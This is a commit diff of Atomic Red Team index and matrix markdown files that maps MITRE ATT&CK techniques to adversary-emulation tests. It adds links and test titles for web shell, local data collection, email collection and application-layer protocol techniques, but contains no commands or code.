| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Local Job Scheduling](./T1168/T1168.md) | [Web Shell](./T1100/T1100.md) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Hidden Files and Directories](./T1158/T1158.md) | [Private Keys](./T1145/T1145.md) | [Process Discovery](./T1057/T1057.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](./T1154/T1154.md) | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | [Input Capture](./T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Information Discovery](./T1082/T1082.md) | | [Screen Capture](./T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Trap](./T1154/T1154.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Web Shell](./T1100/T1100.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Remote File Copy](./T1105/T1105.md) |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Space after Filename](./T1151/T1151.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
atomics/macos-index.md
+8 -5
View File
@@ -53,7 +53,7 @@
- [T1154 Trap](./T1154/T1154.md)
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
@@ -144,8 +144,10 @@
- [T1119 Automated Collection](./T1119/T1119.md)
- [T1115 Clipboard Data](./T1115/T1115.md)
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.sh [linux, macos]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- Atomic Test #1: Search macOS Safari Cookies [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056 Input Capture](./T1056/T1056.md)
@@ -161,7 +163,7 @@
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #1: Data Encrypted [macos, centos, ubuntu, linux]
- Atomic Test #1: Data Encrypted with zip and gpg [macos, centos, ubuntu, linux]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, centos, ubuntu, linux]
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
@@ -286,7 +288,8 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #2: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
@@ -325,5 +328,5 @@
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
atomics/macos-matrix.md
+4 -4
View File
@@ -6,24 +6,24 @@
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | [File Permissions Modification](./T1222/T1222.md) | [Input Prompt](./T1141/T1141.md) | [Network Sniffing](./T1040/T1040.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | [Launch Agent](./T1159/T1159.md) | [Sudo](./T1169/T1169.md) | [Gatekeeper Bypass](./T1144/T1144.md) | [Keychain](./T1142/T1142.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Launch Daemon](./T1160/T1160.md) | [Sudo Caching](./T1206/T1206.md) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | [Input Capture](./T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | [Private Keys](./T1145/T1145.md) | [Process Discovery](./T1057/T1057.md) | | [Screen Capture](./T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Trap](./T1154/T1154.md) | [Local Job Scheduling](./T1168/T1168.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](./T1147/T1147.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Trap](./T1154/T1154.md) | [Local Job Scheduling](./T1168/T1168.md) | [Web Shell](./T1100/T1100.md) | [Hidden Users](./T1147/T1147.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Logon Scripts](./T1037/T1037.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Information Discovery](./T1082/T1082.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Plist Modification](./T1150/T1150.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](./T1130/T1130.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote File Copy](./T1105/T1105.md) |
| | | [Rc.common](./T1163/T1163.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Rc.common](./T1163/T1163.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | | [Re-opened Applications](./T1164/T1164.md) | | [Launchctl](./T1152/T1152.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | [Startup Items](./T1165/T1165.md) | | [Plist Modification](./T1150/T1150.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Trap](./T1154/T1154.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Web Shell](./T1100/T1100.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | [Space after Filename](./T1151/T1151.md) | | | | | | |
atomics/matrix.md
+5 -5
View File
@@ -6,10 +6,10 @@
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Account Manipulation](./T1098/T1098.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](./T1201/T1201.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote File Copy](./T1105/T1105.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote File Copy](./T1105/T1105.md) | [Email Collection](./T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Capture](./T1056/T1056.md) | [Permission Groups Discovery](./T1069/T1069.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Prompt](./T1141/T1141.md) | [Process Discovery](./T1057/T1057.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | [DCShadow](./T1207/T1207.md) | Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](./T1012/T1012.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -17,7 +17,7 @@
| | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | DLL Side-Loading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](./T1170/T1170.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [New Service](./T1050/T1050.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Network Sniffing](./T1040/T1040.md) | [System Information Discovery](./T1082/T1082.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Password Filter DLL](./T1174/T1174.md) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](./T1145/T1145.md) | [System Network Connections Discovery](./T1049/T1049.md) | [Windows Remote Management](./T1028/T1028.md) | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](./T1145/T1145.md) | [System Network Connections Discovery](./T1049/T1049.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | [Regsvr32](./T1117/T1117.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | [File Deletion](./T1107/T1107.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | | [System Time Discovery](./T1124/T1124.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
@@ -28,7 +28,7 @@
| | [Source](./T1153/T1153.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo](./T1169/T1169.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
| | [Space after Filename](./T1151/T1151.md) | [Launch Agent](./T1159/T1159.md) | [Sudo Caching](./T1206/T1206.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | [Trap](./T1154/T1154.md) | [Launchctl](./T1152/T1152.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
